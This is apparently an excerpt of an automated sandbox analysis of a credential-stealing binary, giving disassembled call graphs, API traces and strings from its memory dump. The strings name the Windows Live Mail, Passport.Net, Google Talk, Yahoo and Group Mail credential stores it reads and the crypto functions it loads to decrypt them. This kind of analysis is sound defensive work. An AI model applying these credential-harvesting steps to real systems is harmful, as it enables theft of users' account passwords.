                                  • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                • API String ID: 2768085393-2409096184
                                • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                Control-flow Graph

                                control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 257 444c80-444c85 254->257 258 444c9f-444ca3 254->258 263 444d02-444d0d __setusermatherr 255->263 264 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->264 257->252 260 444c8c-444c93 257->260 258->252 261 444ca5-444ca7 258->261 260->252 265 444c95-444c9d 260->265 262 444cad-444cb0 261->262 262->255 263->264 268 444da4-444da7 264->268 269 444d6a-444d72 264->269 265->262 270 444d81-444d85 268->270 271 444da9-444dad 268->271 272 444d74-444d76 269->272 273 444d78-444d7b 269->273 275 444d87-444d89 270->275 276 444d8b-444d9c GetStartupInfoA 270->276 271->268 272->269 272->273 273->270 274 444d7d-444d7e 273->274 274->270 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                • String ID:
                                • API String ID: 3662548030-0
                                • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                Control-flow Graph

                                APIs
                                • memset.MSVCRT ref: 0044430B
                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                • memset.MSVCRT ref: 00444379
                                • memset.MSVCRT ref: 00444394
                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                • strlen.MSVCRT ref: 004443DB
                                • _strcmpi.MSVCRT ref: 00444401
                                Strings
                                • Store Root, xrefs: 004443A5
                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                • \Microsoft\Windows Mail, xrefs: 00444329
                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                • API String ID: 832325562-2578778931
                                • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                Control-flow Graph

                                control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                APIs
                                • memset.MSVCRT ref: 0040F567
                                • memset.MSVCRT ref: 0040F57F
                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                • memcpy.MSVCRT ref: 0040F652
                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                • String ID:
                                • API String ID: 2012582556-3916222277
                                • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                Control-flow Graph

                                control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                APIs
                                • memset.MSVCRT ref: 004037EB
                                • memset.MSVCRT ref: 004037FF
                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                • strchr.MSVCRT ref: 0040386E
                                • _mbscpy.MSVCRT ref: 0040388B
                                • strlen.MSVCRT ref: 00403897
                                • sprintf.MSVCRT ref: 004038B7
                                • _mbscpy.MSVCRT ref: 004038CD
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                • String ID: %s@yahoo.com
                                • API String ID: 317221925-3288273942
                                • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                Control-flow Graph

                                control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                APIs
                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadMessageProc
                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                • API String ID: 2780580303-317687271
                                • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                Control-flow Graph

                                control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                APIs
                                • memset.MSVCRT ref: 00403504
                                • memset.MSVCRT ref: 0040351A
                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                • _mbscpy.MSVCRT ref: 00403555
                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                • _mbscat.MSVCRT ref: 0040356D
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                • API String ID: 3071782539-966475738
                                • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                Control-flow Graph

                                control_flow_graph 374 40f6e2-40f70a call 40466b call 4045db 379 40f710-40f717 call 404734 374->379 380 40f7e9-40f801 call 404656 call 404785 374->380 379->380 385 40f71d-40f72e CredReadA 379->385 385->380 387 40f734-40f73a 385->387 389 40f740-40f743 387->389 390 40f7e5 387->390 389->390 391 40f749-40f759 389->391 390->380 392 40f75a-40f770 391->392 392->392 393 40f772-40f795 call 4047a5 392->393 396 40f7e2 393->396 397 40f797-40f7b6 WideCharToMultiByte 393->397 396->390 398 40f7b8-40f7c6 strlen 397->398 399 40f7d9-40f7dc LocalFree 397->399 398->399 400 40f7c8-40f7d8 _mbscpy 398->400 399->396 400->399
                                APIs
                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F729
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                • strlen.MSVCRT ref: 0040F7BE
                                • _mbscpy.MSVCRT ref: 0040F7CF
                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                • String ID: Passport.Net\*
                                • API String ID: 4000595657-3671122194
                                • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59

                                Control-flow Graph

                                control_flow_graph 401 40ccd7-40cd06 ??2@YAPAXI@Z 402 40cd08-40cd0d 401->402 403 40cd0f 401->403 404 40cd11-40cd24 ??2@YAPAXI@Z 402->404 403->404 405 40cd26-40cd2d call 404025 404->405 406 40cd2f 404->406 408 40cd31-40cd57 405->408 406->408 410 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 408->410 411 40cd59-40cd60 DeleteObject 408->411 411->410
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                • String ID:
                                • API String ID: 2054149589-0
                                • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                • memset.MSVCRT ref: 00408620
                                  • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                • memset.MSVCRT ref: 00408671
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                Strings
                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                • String ID: Software\Google\Google Talk\Accounts
                                • API String ID: 1366857005-1079885057
                                • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                Control-flow Graph

                                control_flow_graph 441 40ba28-40ba3a 442 40ba87-40ba9b call 406c62 441->442 443 40ba3c-40ba52 call 407e20 _mbsicmp 441->443 465 40ba9d call 4107f1 442->465 466 40ba9d call 404734 442->466 467 40ba9d call 404785 442->467 468 40ba9d call 403c16 442->468 469 40ba9d call 410a9c 442->469 448 40ba54-40ba6d call 407e20 443->448 449 40ba7b-40ba85 443->449 454 40ba74 448->454 455 40ba6f-40ba72 448->455 449->442 449->443 450 40baa0-40bab3 call 407e30 458 40bab5-40bac1 450->458 459 40bafa-40bb09 SetCursor 450->459 457 40ba75-40ba76 call 40b5e5 454->457 455->457 457->449 461 40bac3-40bace 458->461 462 40bad8-40baf7 qsort 458->462 461->462 462->459 465->450 466->450 467->450 468->450 469->450
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Cursor_mbsicmpqsort
                                • String ID: /nosort$/sort
                                • API String ID: 882979914-1578091866
                                • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                APIs
                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                  • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                • memset.MSVCRT ref: 00410E10
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                • _mbscpy.MSVCRT ref: 00410E87
                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                • API String ID: 889583718-2036018995
                                • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                APIs
                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID:
                                • API String ID: 3473537107-0
                                APIs
                                • memset.MSVCRT ref: 004109F7
                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                  • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                • memset.MSVCRT ref: 00410A32
                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                Similarity
                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                • String ID:
                                • API String ID: 3143880245-0
                                Similarity
                                • API ID: ??2@
                                • String ID:
                                • API String ID: 1033339047-0
                                Similarity
                                • API ID: ??3@mallocmemcpy
                                • String ID:
                                • API String ID: 3831604043-0
                                APIs
                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                Similarity
                                • API ID: CreateFontIndirect_mbscpymemset
                                • String ID: Arial
                                • API String ID: 3853255127-493054409
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                • _strcmpi.MSVCRT ref: 0040CEC3
                                Similarity
                                • API ID: strlen$_strcmpimemset
                                • String ID: /stext
                                • API String ID: 520177685-3817206916
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                APIs
                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                Similarity
                                • API ID: Library$AddressFreeLoadProc
                                • String ID:
                                • API String ID: 145871493-0
                                APIs
                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                Similarity
                                • API ID: PrivateProfile$StringWrite_itoamemset
                                • String ID:
                                • API String ID: 4165544737-0
                                APIs
                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                APIs
                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                APIs
                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                APIs
                                • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                Similarity
                                • API ID: EnumNamesResource
                                • String ID:
                                • API String ID: 3334572018-0
                                APIs
                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                APIs
                                • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                APIs
                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                APIs
                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                Similarity
                                • API ID: AddressProc$LibraryLoad
